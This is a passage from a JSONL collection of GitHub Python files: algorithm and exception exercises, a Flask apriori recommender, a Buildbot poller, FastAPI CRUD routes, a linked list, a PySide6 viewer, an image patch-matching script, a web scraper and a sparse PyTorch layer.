Solution:\r\n\t'''input:[1,2,3,4,5],target=9,out:[3,4]'''\r\n\tdef slist(self,nums,target):\r\n\t\thashmap = {}\r\n\t\tfor index,num in enumerate(nums):\r\n\t\t\tanother_num = target-num\r\n\t\t\tif 
another_num in hashmap:\r\n\t\t\t\treturn [hashmap[another_num],index]\r\n\t\t\thashmap[num] = index\r\ns = Solution()\r\nr=s.slist([1,2,3,4,5],9)\r\nprint(r)\r\n\r\n# Singleton pattern\r\nclass Singe:\r\n\tdef __new__(cls,*args,**kwargs):\r\n\t\tif not hasattr(cls, '_instance'):\r\n\t\t\t_instance = super().__new__(cls,*args,**kwargs)\r\n\t\t\tcls._instance = _instance\r\n\t\treturn cls._instance\r\n\r\na = Singe()\r\nb = Singe()\r\nprint(a is b)\r\n\r\n# Decorator\r\nfrom functools import wraps\r\nimport time\r\ndef timelog(_int=False):\r\n\tdef log(func):\r\n\t\t@wraps(func)\r\n\t\tdef _log(*args,**kwargs):\r\n\t\t\tbeg = time.time()\r\n\t\t\tres = func(*args,**kwargs)\r\n\t\t\tif _int:\r\n\t\t\t\tprint('elapsed: %s s'%(int(time.time()-beg)))\r\n\t\t\telse:\r\n\t\t\t\tprint('elapsed: %s s'%(time.time()-beg))\r\n\t\t\treturn res\r\n\t\treturn _log\r\n\treturn log\r\n@timelog(True)\r\ndef mytime():\r\n\ttime.sleep(1)\r\nmytime()\r\n\r\nclass TimeLog:\r\n\tdef __init__(self,_int=False):\r\n\t\tself._int = _int\r\n\tdef __call__(self,func):\r\n\t\t@wraps(func)\r\n\t\tdef _log(*args,**kwargs):\r\n\t\t\tbeg = time.time()\r\n\t\t\tres = func(*args,**kwargs)\r\n\t\t\tif self._int:\r\n\t\t\t\tprint('elapsed: %s s'%(int(time.time()-beg)))\r\n\t\t\telse:\r\n\t\t\t\tprint('elapsed: %s s'%(time.time()-beg))\r\n\t\t\treturn res\r\n\t\treturn _log\r\n\r\n@TimeLog(True)\r\ndef mtime():\r\n\ttime.sleep(1)\r\nmtime()\r\n\r\n","repo_name":"heping945/separatepyfile","sub_path":"filefolder/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"14390674477","text":"#---------- Easy A ----------#\r\n\r\nnumber = int(input(\"Number: \")) \r\n\r\nif number < 0: # If the number is negative\r\n    raise ValueError(\"Input error!\") # Raise an exception\r\nelse:\r\n    print(\"it's ok\") # Otherwise everything is fine \r\n\r\n\r\n\r\n\r\n\r\n#---------- Easy B ----------#\r\n\r\ntry: \r\n    number = int(input(\"Number: \")) # Try to read an integer from the console\r\nexcept:\r\n    print(\"srsly?\") # If an exception is raised, print the required answer\r\nelse:\r\n    print(number) # And if everything is fine, print the number back\r\n\r\n\r\n\r\n\r\n\r\n#---------- Easy C ----------#\r\n\r\nname = input(\"Name: \")\r\n\r\nif name[0].isupper(): # If the first character of the string is an uppercase letter\r\n    print(\"welcome\") # Then it is what we need\r\nelse:\r\n    raise NameError(\"dude, seriously...\") # Otherwise raise an exception\r\n\r\n\r\n\r\n\r\n\r\n#---------- Medium A ----------#\r\n\r\nname = input(\"Name: \")\r\n\r\nfor symbol in name: # Iterate over the name (a string)\r\n    if not symbol.isalpha(): # If some character is NOT a letter\r\n        raise NameError(\"dude, seriously...\") # Raise an exception\r\n    \r\nprint(\"welcome\") # If the program has not raised an exception by this point, print the required answer\r\n\r\n\r\n\r\n\r\n\r\n#---------- Medium B ----------#\r\n\r\nemail = input(\"email: \")\r\n\r\nif email.count(\"@\") == 1: # If the number of \"@\" characters equals 1\r\n    print(\"ok\") # That is fine\r\nelse:\r\n    raise Exception(\"dude, seriously...\") # If not, raise an exception\r\n\r\n\r\n\r\n\r\n\r\n#---------- Medium C ----------#\r\n\r\nemail = input(\"email: \") \r\nat_index = email.find(\"@\") # Find the index of the \"@\" character\r\n\r\nfor symbol in email[:at_index]: # Iterate over the slice of the string before the \"@\"\r\n    if not symbol.islower(): # If some character is NOT a lowercase letter\r\n        raise Exception(\"dude, seriously...\") # Raise an exception\r\n    \r\nprint(\"ok\") # If the program has not raised an exception by this point, print the required answer 
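
#---------- Bonus ----------#
# Illustrative sketch only, not part of the original exercise set: the Medium B
# and Medium C checks combined into one reusable validator. The name
# 'validate_email' is an assumption and does not appear above.

def validate_email(email):
    if email.count('@') != 1: # Exactly one '@' is required
        raise Exception('dude, seriously...')
    for symbol in email[:email.find('@')]: # Local part must be all lowercase letters
        if not symbol.islower():
            raise Exception('dude, seriously...')
    print('ok')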
","repo_name":"tebirenn/python_problems","sub_path":"lesson_17/cw17.py","file_name":"cw17.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40991527730","text":"from flask import Flask, request\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return \"Sent\"\n\n@app.route('/data', methods=['POST'])\ndef ml():\n import json\n if request.method == 'POST':\n data = request.get_data()\n json_ob = json.loads(data)\n\n from apyori import apriori\n from apyori import load_transactions\n\n orders = json_ob[\"orders\"]\n\n class Recommender():\n def __init__(self, inputFile):\n self.AssociationRulesDictionary = {} # holds final output\n self.dataFile = inputFile # input datafile in csv form\n self.association_rules = [] # holds output from Apriori algo\n\n def computeRules(self):\n \"\"\"\n Copmputes all association rules.\n :return:\n \"\"\"\n with open(self.dataFile) as fileObj:\n transactions = list(load_transactions(fileObj, delimiter=\",\"))\n\n # remove empty strings if any\n transactions_filtered = []\n a = set()\n\n for li in transactions:\n li = list(filter(None, li))\n transactions_filtered.append(li)\n a |= set(li)\n\n self.association_rules = apriori(transactions_filtered, min_support=0.01, min_confidence=0.01,\n min_lift=1.0,\n max_length=None)\n\n def extractRules(self):\n\n for item in self.association_rules:\n\n if len(item[0]) < 2:\n continue\n\n for k in item[2]:\n\n baseItemList = list(k[0])\n # if base item set is empty then go to the next record.\n if not baseItemList:\n continue\n\n # sort the baseItemList before adding it as a key to the AssociationRules dictionary\n baseItemList.sort()\n baseItemList_key = tuple(baseItemList)\n\n if baseItemList_key not in self.AssociationRulesDictionary.keys():\n self.AssociationRulesDictionary[baseItemList_key] = []\n\n self.AssociationRulesDictionary[baseItemList_key].append((list(k[1]), k[3]))\n\n # sort the rules in descending order of lift values.\n for ruleList in self.AssociationRulesDictionary:\n self.AssociationRulesDictionary[ruleList].sort(key=lambda x: x[1], reverse=True)\n\n def recommend(self, itemList, Num=1):\n \"\"\"\n itemList is a list of items selected by user\n Num is total recommendations required.\n :param item:\n :return:\n \"\"\"\n\n # convert itemList to itemTuple as our dictionary key is a sorted tuple\n itemList.sort()\n itemTuple = tuple(itemList)\n\n if itemTuple not in self.AssociationRulesDictionary.keys():\n return []\n\n return self.AssociationRulesDictionary[itemTuple][:Num]\n\n def studyRules(self):\n \"\"\"\n This is a template method for computation and rule extraction.\n :return:\n \"\"\"\n self.computeRules()\n self.extractRules()\n\n Biobuy = Recommender(\"my_new_csv.csv\")\n Biobuy.studyRules()\n\n return str(Biobuy.recommend(orders, 3))\n\n\n\n","repo_name":"unitSphere/flask","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39042727562","text":"from buildbot.changes.base import PollingChangeSource\nfrom buildbot.process.logobserver import LineConsumerLogObserver\nfrom buildbot.util import json\nfrom buildbot.util import ascii2unicode\nfrom buildbot.util.state import StateMixin\nfrom buildbot.steps.shell import ShellCommand\nfrom twisted.internet import defer\nfrom twisted.internet import utils\nfrom twisted.python import 
log\n\nimport re\nimport os\n\n\nclass BuildStep(ShellCommand):\n    new_build_re = re.compile(r'Need rebuild of ([\w\.]+)/\.')\n    finished_build_re = re.compile(r'Subtask commit build of gnome-continuous/components/([\w\.]+)/x86_64/\.')\n    currentComponent = ''\n\n    def __init__(self, **kwargs):\n        ShellCommand.__init__(self, **kwargs)\n        self.addLogObserver('stdio', LineConsumerLogObserver(self.logConsumer))\n\n    def getCurrentSummary(self):\n        if self.currentComponent:\n            return {u'step': u\"Building %s\" % self.currentComponent}\n        else:\n            return {u'step': u\"Starting\"}\n\n    def getResultSummary(self):\n        return {u'step': u\"Done\"}\n\n    def logConsumer(self):\n        while True:\n            stream, line = yield\n            m = self.new_build_re.match(line.strip())\n            if m is not None:\n                self.currentComponent = m.group(1)\n                self.updateSummary()\n            m = self.finished_build_re.match(line.strip())\n            if m is not None:\n                component = m.group(1)\n                log_contents = ''\n                with open(\"local/build/log-%s.txt\" % component, 'r') as f:\n                    log_contents = f.read()\n                self.addCompleteLog('log-%s' % component, log_contents)\n\n\nclass BGOPoller(PollingChangeSource, StateMixin):\n    def __init__(self, workdir=None, pollInterval=5 * 60, pollAtLaunch=True,\n                 name='BGOPoller'):\n        PollingChangeSource.__init__(self, name=name,\n                                     pollInterval=pollInterval,\n                                     pollAtLaunch=pollAtLaunch)\n        self.lastRev = {}\n        self.workdir = workdir\n\n    def activate(self):\n        # make our workdir absolute, relative to the master's basedir\n        if not os.path.isabs(self.workdir):\n            self.workdir = os.path.join(self.master.basedir, self.workdir)\n\n        log.msg(\"BGOPoller: using workdir '%s'\" % self.workdir)\n        d = self.getState('lastRev', {})\n\n        def setLastRev(lastRev):\n            self.lastRev = lastRev\n        d.addCallback(setLastRev)\n        d.addCallback(lambda _: PollingChangeSource.activate(self))\n        d.addErrback(log.err, 'while initializing BGOPoller')\n\n    def _dovccmd(self, command, path=None):\n        d = utils.getProcessOutputAndValue('ostbuild', ['make', '-n'] + command,\n                                           path=path, env=os.environ)\n\n        def _convert_nonzero_to_failure(res):\n            \"utility to handle the result of getProcessOutputAndValue\"\n            (stdout, stderr, code) = res\n            if code != 0:\n                raise EnvironmentError('command failed with exit code %d: %s'\n                                       % (code, stderr))\n            return stdout.strip()\n        d.addCallback(_convert_nonzero_to_failure)\n        return d\n\n    @defer.inlineCallbacks\n    def poll(self):\n        log.msg('BGOPoller: running resolve & bdiff')\n        yield self._dovccmd(['resolve', 'fetchAll=true'], self.workdir)\n        yield self._dovccmd(['bdiff'], self.workdir)\n        log.msg('BGOPoller: resolve & bdiff complete')\n        bdiff = json.load(open('local/bdiff.json'))\n        log.msg('BGOPoller: got bdiff: %s' % bdiff)\n        rev = {}\n        for change_type in ['added', 'modified', 'removed']:\n            if 'gitlog' in bdiff[change_type].keys():\n                project = bdiff[change_type]['latest']['name']\n                src = bdiff[change_type]['latest']['src']\n                gitlog = bdiff[change_type]['gitlog']\n                for change in gitlog:\n                    rev = change\n                    yield self._process_changes(change, project, src)\n        self.lastRev = rev\n        yield self.setState('lastRev', self.lastRev)\n\n    @defer.inlineCallbacks\n    def _process_changes(self, newRev, project, src):\n        revision = newRev['Checksum']\n        author = newRev['From']\n        timestamp = newRev['Date']\n\n        yield self.master.data.updates.addChange(\n            author=author,\n            revision=revision,\n            files=[],\n            comments=[],\n            when_timestamp=timestamp,\n            branch=project,\n            category=self.category,\n            project=self.project,\n            repository=ascii2unicode(src),\n            src=u'git')\n","repo_name":"vrutkovs/buildbot-bgo","sub_path":"custom_steps.py","file_name":"custom_steps.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"26625806097","text":"from typing import List\nfrom fastapi import APIRouter,status,Depends,HTTPException,Response\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.future import select\nfrom models.game_model import GameModel\nfrom models.user_model import UserModel\nfrom schemas.game_schemas import GameSchema\nfrom core.deps import get_current_user,get_session\nfrom fastapi_limiter.depends import RateLimiter\n\nrouter = APIRouter()\n\n@router.get('/',status_code=status.HTTP_200_OK,response_model=List[GameSchema])\nasync def get_games(db:AsyncSession = Depends(get_session)):\n    async with db as session:\n        query = select(GameModel)\n        result = await session.execute(query)\n        games:List[GameModel] = result.scalars().unique().all()\n\n    return games\n\n\n@router.get('/{game_id}',status_code=status.HTTP_200_OK,response_model=GameSchema)\nasync def get_game(game_id:int,db:AsyncSession = Depends(get_session)):\n    async with db as session:\n        query = select(GameModel).filter(GameModel.id == game_id)\n        result = await session.execute(query)\n        game:GameModel = result.scalars().unique().one_or_none()\n\n        if game:\n            return game\n        else :\n            raise HTTPException(detail=\"Game not found\",status_code=status.HTTP_404_NOT_FOUND)\n\n@router.post('/',status_code=status.HTTP_201_CREATED,response_model=GameSchema)\nasync def post_game(game:GameSchema,user_logged:UserModel = Depends(get_current_user),db:AsyncSession = Depends(get_session)):\n    new_game = GameModel(nome=game.nome,ano_lancamento=game.ano_lancamento,nota=game.nota,lista_desejo=game.lista_desejo,genero=game.genero,classificacao_indicativa=game.classificacao_indicativa,criador_id=user_logged.id)\n\n    db.add(new_game)\n    await db.commit()\n\n    return new_game\n\n@router.put('/{game_id}',status_code=status.HTTP_202_ACCEPTED,response_model=GameSchema)\nasync def put_game(game_id:int,game:GameSchema,db:AsyncSession=Depends(get_session),user_logged:UserModel=Depends(get_current_user)):\n    async with db as session:\n        query = select(GameModel).filter(GameModel.id == game_id).filter(UserModel.id == user_logged.id)\n        result = await session.execute(query)\n        game_updated:GameModel = result.scalars().unique().one_or_none()\n\n        if game_updated:\n            game_updated = game\n            await session.commit()\n\n            return game_updated\n        \n        else:\n            raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail='Game not found')\n\n@router.delete('/{game_id}',status_code=status.HTTP_204_NO_CONTENT)\nasync def delete_game(game_id:int,db:AsyncSession = Depends(get_session),user_logged:UserModel=Depends(get_current_user)):\n    async with db as session:\n        query = select(GameModel).filter(GameModel.id == game_id).filter(UserModel.id == user_logged.id)\n        result = await session.execute(query) \n        game_deleted:GameModel = result.scalars().unique().one_or_none()\n\n        if game_deleted:\n            await session.delete(game_deleted)\n            await session.commit()\n            return Response(status_code=status.HTTP_204_NO_CONTENT)\n        \n        else:\n            raise HTTPException(detail=\"Game not found\",status_code=status.HTTP_404_NOT_FOUND)\n            
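
# Illustrative sketch, not in the original file: RateLimiter is imported above
# but never used. Assuming FastAPILimiter.init(...) is called at application
# startup, it could throttle an endpoint like this; the route name and limits
# here are hypothetical.
@router.get('/limited',status_code=status.HTTP_200_OK,response_model=List[GameSchema],
            dependencies=[Depends(RateLimiter(times=5, seconds=60))])
async def get_games_limited(db:AsyncSession = Depends(get_session)):
    # Reuses the plain listing handler under a rate limit
    return await get_games(db)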
\n\n","repo_name":"guilherme-da-silva-maciel/fast-api-game_api","sub_path":"project/api/routes/endpoints/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9194398873","text":"class Node:\n '''\n Create a Node class that has properties for the value stored in the Node, and a pointer to the next Node.\n '''\n def __init__(self,value,next=None):\n self.value=value\n self.next=next\n\nclass LinkedList():\n def __init__(self):\n self.head=None\n\n def kt_from_end(self,k):\n if k>=0:\n if self.head==None:\n return 'empty linked list'\n else:\n i=0\n current=self.head\n while current:\n current=current.next\n i+=1\n if i-1 { b } -> { c } -> NULL\"\n '''\n\n if self.head==None:\n return('Empty linked List')\n i=self.head\n strll=''\n while i:\n if i!=None:\n strll += str( { i.value } ) + ' -> ' \n \n i=i.next\n if i==None:\n strll+='NULL'\n return (strll)\n\n def includes_node(self,inc_val):\n '''\n this method takes any value as an argument and returns a boolean result depending on whether that value exists as a Node’s value somewhere within the list.\n '''\n current=self.head\n while current!= None:\n if current.value==inc_val:\n return True\n else:\n current=current.next\n return False\n\n def insert_before(self,indx,val):\n node3=Node(val)\n if not self.includes_node(indx):\n return 'value not found '\n elif self.head.value==indx:\n self.insert_node(val)\n else:\n i=self.head\n while i.next!=None:\n if i.next.value==indx:\n node3.next=i.next\n i.next=node3\n break\n i=i.next\n \n def insert_after(self,indx,val):\n print('index',indx)\n node3=Node(val)\n if not self.includes_node(indx):\n return 'value not found '\n else:\n i=self.head\n while i.next!=None:\n if i.value==indx:\n node3.next=i.next\n i.next=node3\n break\n i=i.next\n i.next=node3\n\n def append(self,data):\n #st1 : init current with head (i=0)\n node=Node(data) \n if self.head==None:\n self.head=node\n # create data node \n #st2 --> keep moving until reach ast node l\n else:\n current=self.head\n while(current.next!=None):\n current=current.next \n #current is last node\n # make curret point to new nodes \n current.next=node\n \n # def isPalind(self):\n # cur=self.head\n # op=[]\n # while cur:\n # op.append(cur.value)\n # cur=cur.next\n \n # # print(len(op))\n # n=len(op)\n # print(op)\n # print(op[-2])\n\n # for i in range(len(op)):\n # print('iiiiii',i,op[i],-i-1,op[-i-1])\n # if op[i]==op[i-i] and i != n and i-1 !=n and len(op)!=1:\n # # if op[i] and op[len(op)-1] ==n:\n # v=op.pop(i)\n # v2=op.pop()\n # print('oooooooooooopppppppp',op)\n \n # print('v,v2',v,v2)\n \n # if len(op)==1:\n # return True\n # return False\n def palind(self):\n list2 = []\n current =self.head\n while current:\n list2.append(current.value)\n current= current.next\n print('list',list2)\n print(' reversed list ',list2[::-1])\n\n for ele in list2[::-1]:\n current=self.head\n if ele==current.value:\n return True\n return False\n \n\n def reversed(self):\n list=[]\n reverse=[]\n cur=self.head\n while cur:\n list.append(cur.value)\n cur=cur.next\n # print(list)\n for i in range(len(list)):\n reverse.append(list[-i-1])\n # reverse.append(list.pop())\n return reverse\n\n \n\n # pal=True\n # while current:\n # value=list2.pop()\n # print(pal)\n # if current.value==value:\n # pal=True\n # else:\n # pal= False\n # current=current.next\n # return pal\n\n # isPalind =True\n # while current:\n # value= list2.pop()\n # if 
current.value == value :\n # isPalind = True\n # else:\n # isPalind=False\n # current = current.next\n # return isPalind\n\nif __name__ == \"__main__\":\n ll=LinkedList()\n ll.insert_node(5)\n ll.insert_node(10)\n ll.insert_node(15)\n ll.insert_node(20)\n ll.insert_node(25)\n # {25} -> {20} -> {15} -> {10} -> {5} -> NULL\n print(ll.insert_after(10,0))\n print(ll.insert_before(5,-1))\n print(ll.insert_after(5,-20))\n l2=LinkedList()\n l2.insert_node(5)\n l2.insert_node(10)\n l2.insert_node(15)\n l2.insert_node(10)\n l2.insert_node(5)\n print(ll.palind())\n print(l2.palind())\n print(ll)\n print(ll.reversed())\n # print(ll.kt_from_end(2))","repo_name":"hadeelhhawajreh/data-structures-and-algorithms-c401","sub_path":"data_structures_and_algorithms/data_structures/linked_list/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2775009867","text":"import dataclasses\nfrom io import BytesIO\n\nfrom PySide6 import QtGui, QtCore\nfrom PySide6.QtCore import Signal, QRunnable, QThreadPool, QObject, Qt\nfrom PySide6.QtWidgets import (\n QTreeWidgetItem,\n QTreeWidget,\n QLayout,\n)\n\nfrom starhopper.formats.esm.file import Group, ESMContainer, Record, RecordFlag\nfrom starhopper.gui.common import (\n tr,\n ColorGray,\n ColorPurple,\n monospace,\n ColorRed,\n ColorOrange,\n)\nfrom starhopper.gui.viewers.record_viewer import RecordViewer\nfrom starhopper.gui.viewers.viewer import Viewer\nfrom starhopper.io import BinaryReader\n\n\nclass RecordChild(QTreeWidgetItem):\n def __init__(self, record: Record):\n super().__init__()\n self.record = record\n\n\nclass GroupChild(QTreeWidgetItem):\n def __init__(self, group: Group):\n super().__init__()\n self.group = group\n\n\nclass GroupLoaderSignals(QObject):\n progressStart = Signal(int)\n progressDone = Signal()\n\n\nclass GroupLoaderThread(QRunnable):\n \"\"\"\n Loads a group in the background and populates the details view.\n \"\"\"\n\n def __init__(self, viewer: \"GroupViewer\", group: Group):\n super().__init__()\n self.viewer = viewer\n self.group = group\n self.s = GroupLoaderSignals()\n\n def run(self):\n self.s.progressStart.emit(self.group.loc.size)\n\n item = QTreeWidgetItem(self.viewer.details)\n item.setText(0, tr(\"GroupViewer\", \"Details\", None))\n item.addChildren(\n [\n QTreeWidgetItem([\"Type\", self.group.type.decode(\"ascii\")]),\n QTreeWidgetItem([\"Size\", f\"{self.group.size} bytes\"]),\n QTreeWidgetItem([\"Label\", repr(self.group.label)]),\n QTreeWidgetItem([\"Group Type\", str(self.group.group_type)]),\n QTreeWidgetItem([\"Version\", str(self.group.version)]),\n QTreeWidgetItem([\"Start\", f\"{self.group.loc.start:08x}\"]),\n QTreeWidgetItem([\"End\", f\"0x{self.group.loc.end:08x}\"]),\n QTreeWidgetItem([\"Size\", f\"0x{self.group.loc.size:08x}\"]),\n ]\n )\n item.setExpanded(True)\n\n for child in self.group.children():\n if isinstance(child, Group):\n item = GroupChild(group=child)\n item.setText(0, child.type.decode(\"ascii\"))\n item.setText(2, child.get_friendly_label())\n item.setForeground(2, QtGui.QBrush(ColorPurple))\n self.group.file.io.seek(child.loc.end)\n self.viewer.details.addTopLevelItem(item)\n continue\n\n item = RecordChild(record=child)\n item.setText(0, child.type.decode(\"ascii\"))\n item.setText(1, f\"0x{child.form_id:08X}\")\n item.setToolTip(1, tr(\"GroupViewer\", \"Form ID\", None))\n item.setFont(1, monospace())\n item.setForeground(1, ColorOrange)\n\n if 
child.flags & RecordFlag.Deleted:\n item.setForeground(0, QtGui.QBrush(ColorRed))\n\n for field in child.fields():\n # As a special case, we pull up any EDID fields to the top\n # level of the tree as a label for the record.\n if field.type == b\"EDID\":\n with BytesIO(field.data) as data:\n io = BinaryReader(data)\n with io as edid:\n edid.cstring(\"name\")\n item.setText(2, edid.data[\"name\"])\n item.setToolTip(\n 2, tr(\"GroupViewer\", \"Editor ID\", None)\n )\n item.setForeground(\n 2,\n QtGui.QBrush(ColorPurple),\n )\n\n break\n\n self.viewer.details.addTopLevelItem(item)\n self.group.file.io.seek(child.loc.end)\n\n self.s.progressDone.emit()\n\n\nclass GroupViewer(Viewer):\n \"\"\"\n Displays a single group in a tree view.\n\n Uses a background thread to load the group and populate the tree without\n blocking the UI thread.\n \"\"\"\n\n def __init__(self, group: Group, working_area: QLayout):\n super().__init__(working_area=working_area)\n\n self.group = group\n self.file = group.file.file\n self.file.seek(0)\n self.group = dataclasses.replace(\n self.group, file=ESMContainer(self.file)\n )\n\n self.details = QTreeWidget(self)\n self.details.hide()\n self.details.setUniformRowHeights(True)\n self.details.setColumnCount(3)\n self.details.setHeaderLabels(\n (\n tr(\"GroupViewer\", \"Type\", None),\n tr(\"GroupViewer\", \"Form ID\", None),\n tr(\"GroupViewer\", \"EDID\", None),\n )\n )\n self.details.itemDoubleClicked.connect(self.on_item_double_clicked)\n\n loader = GroupLoaderThread(self, group)\n loader.s.progressStart.connect(\n self.on_loading_start, QtCore.Qt.QueuedConnection # noqa\n )\n loader.s.progressDone.connect(\n self.on_loading_complete, QtCore.Qt.QueuedConnection # noqa\n )\n QThreadPool.globalInstance().start(loader)\n\n self.layout.insertWidget(0, self.details)\n\n def on_loading_complete(self):\n super().on_loading_complete()\n self.details.show()\n\n def on_item_double_clicked(self, item: QTreeWidgetItem, column: int):\n self.open_item(item)\n\n def open_item(self, item: QTreeWidgetItem) -> Viewer | None:\n if isinstance(item, GroupChild):\n viewer = GroupViewer(item.group, self.working_area)\n self.add_panel(\"child\", viewer)\n return viewer\n elif isinstance(item, RecordChild):\n viewer = RecordViewer(item.record, self.working_area)\n self.add_panel(\"child\", viewer)\n return viewer\n\n def navigate(self, path: list[str]):\n pass\n","repo_name":"TkTech/starhopper","sub_path":"starhopper/gui/viewers/group_viewer.py","file_name":"group_viewer.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"8472001983","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 9 09:12:43 2015\n\n@author: drizardnicolas\n\"\"\"\nimport numpy as np\nfrom scipy import misc\n\nfrom KLmin import KLmin\nfrom dispresult import dispresult\nfrom patch_matching_color import patch_matching_color\n#from patch_matching_NB import patch_matching_NB\nfrom patch_matching_color_5parameters import patch_matching_color_5parameters\nfrom patch_matching_color_squareparameters import 
patch_matching_color_squareparameters\n\n####################################################################################################################################################################################################################################################################################################################################################################################################################\n#################TO DO:\n\n#Parameters to chose before running the program\npatchs_number=7\n\nimg_result='poupees_test_result.jpg'\nimg_source='img/group.jpg'\neye_source='img/face.png'\n\n#Zoom parameters\nzmin=0.8\nzmax=1.2\ndz=0.2\n\n####################################################################################################################################################################################################################################################################################################################################################################################################################\n\n#load images in fray-scale layer only for the size \nimg = misc.imread(img_source) \neye=misc.imread(eye_source)\n\n#data parameters\n\ni0=eye.shape[0]\nj0=eye.shape[1]\neye_size=i0*j0\n\n\ni1=img.shape[0]\nj1=img.shape[1]\n\n#-------------------------------Patch matching method\n#Method to chose among the following methods:\n# patch_matching_NB\n# patch_matching_color\n# patch_maching_color_5parameters\n# patch_matching_color_squareparameters\n\n[KL, pre_processing_time, patch_matching_time]=patch_matching_color(eye_source, img_source, zmin, zmax, dz)\n\n\n#-------------------------------Finding the top matchs_number patch(es) matching the eye patch in the img based on the KL table\n\n#KL_min stores the top patchs_number patch maching the input eye in the image img\n\nKL_min=KLmin(KL,i0,j0,i1,j1,patchs_number) \n\n#------------------------------Displaying and saving the result\n\n#aliasing img to conserve the original img\nimg_bis=np.zeros(img.shape)\n\nfor i in range(img.shape[0]):\n img_bis[i,:,:]=[row[:] for row in img[i,:,:]] \nimg_bis=img_bis.astype(np.uint8) \n\n#Displaying the result and saving it with the name img_result\ndispresult(img_result,img_bis,i0,j0,KL_min,patchs_number)\n","repo_name":"nicodri/Patch-Detection-in-Image","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"69820017973","text":"import requests\nimport concurrent.futures\n\n\ndef get_html(url):\n try:\n return requests.get(url).content.decode(\"utf-8\")\n except Exception as e:\n print(\"GET ERROR \" + url)\n print(e)\n pass\n\n\ndef write(filepath, content):\n try:\n if content is not None:\n with open(filepath, \"w\") as w:\n w.writelines(content)\n w.close()\n except Exception as e:\n print(\"WRITE ERROR \" + filepath)\n print(e)\n pass\n\n\ndef single_scrape(url, filepath=None):\n try:\n html = get_html(url)\n if len(html) > 0:\n if filepath:\n write(filepath, html)\n return html\n except Exception as e:\n print(e)\n\n\ndef multi_scrape(filepath_url_dict, parse_func=None):\n total = len(filepath_url_dict)\n with concurrent.futures.ThreadPoolExecutor() as executor:\n filepaths = filepath_url_dict.keys()\n future_to_url = {executor.submit(\n get_html, filepath_url_dict[fp]): fp for fp in filepaths}\n count = 0\n for future in concurrent.futures.as_completed(future_to_url):\n filepath = 
future_to_url[future]\n url = filepath_url_dict[filepath]\n try:\n data = future.result()\n except Exception as e:\n print('%r generated an exception: %s' % (url, e))\n else:\n # print('%r page is %d bytes' % (url, len(data)))\n html = data\n if html is not None and len(html) > 0:\n if parse_func is not None:\n content = parse_func(html)\n else:\n content = html\n write(filepath, content)\n\n count += 1\n print(\" %d/%d\" % (count, total), end=\"\\r\", flush=True)\n print(\"\")\n","repo_name":"avarant/webscraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38183476995","text":"import math\nimport torch \nimport torch.nn as nn\n\n\"\"\"\nFunction for activation binarization\n\"\"\"\nclass WeightMaskStep(torch.autograd.Function):\n @staticmethod \n def forward(ctx, input):\n ctx.save_for_backward(input)\n return (input>0.).to(input.dtype)\n\n @staticmethod\n def backward(ctx, grad_output):\n input, = ctx.saved_tensors\n grad_input = grad_output.clone()\n zero_index = torch.abs(input) > 1\n middle_index = (torch.abs(input) <= 1) * (torch.abs(input) > 0.4)\n additional = 2-4*torch.abs(input)\n additional[zero_index] = 0.\n additional[middle_index] = 0.4\n return grad_input*additional\n\nclass SparseLinear(nn.Module):\n def __init__(self, in_features, out_features, bias=True):\n super(SparseLinear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features \n self.weight = nn.Parameter(torch.Tensor(out_features, in_features))\n if bias:\n self.bias = nn.Parameter(torch.Tensor(out_features))\n else:\n self.register_parameter('bias', None)\n\n self.threshold = nn.Parameter(torch.Tensor(out_features))\n self.weight_mask = WeightMaskStep.apply\n #self.mask = None\n self.reset_parameters()\n\n\n def reset_parameters(self):\n nn.init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n nn.init.uniform_(self.bias, -bound, bound) \n with torch.no_grad():\n #std = self.weight.std()\n self.threshold.data.fill_(0)\n \n def forward(self, input):\n abs_weight = torch.abs(self.weight)\n threshold = self.threshold.view(abs_weight.shape[0], -1)\n abs_weight = abs_weight-threshold\n mask = self.weight_mask(abs_weight)\n ratio = torch.sum(mask) / mask.numel()\n #print(\"keep ratio {:.2f}\".format(ratio))\n if ratio <= 0.01:\n with torch.no_grad():\n #std = self.weight.std()\n self.threshold.data.fill_(0)\n abs_weight = torch.abs(self.weight)\n threshold = self.threshold.view(abs_weight.shape[0], -1)\n abs_weight = abs_weight-threshold\n mask = self.weight_mask(abs_weight)\n masked_weight = self.weight * mask \n output = torch.nn.functional.linear(input, masked_weight, self.bias)\n return output\n def extra_repr(self) -> str:\n return 'in_features={}, out_features={}, bias={}'.format(\n self.in_features, self.out_features, self.bias is not None\n )\n \nclass SparseConv2d(nn.Module):\n def __init__(self, in_c, out_c, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, 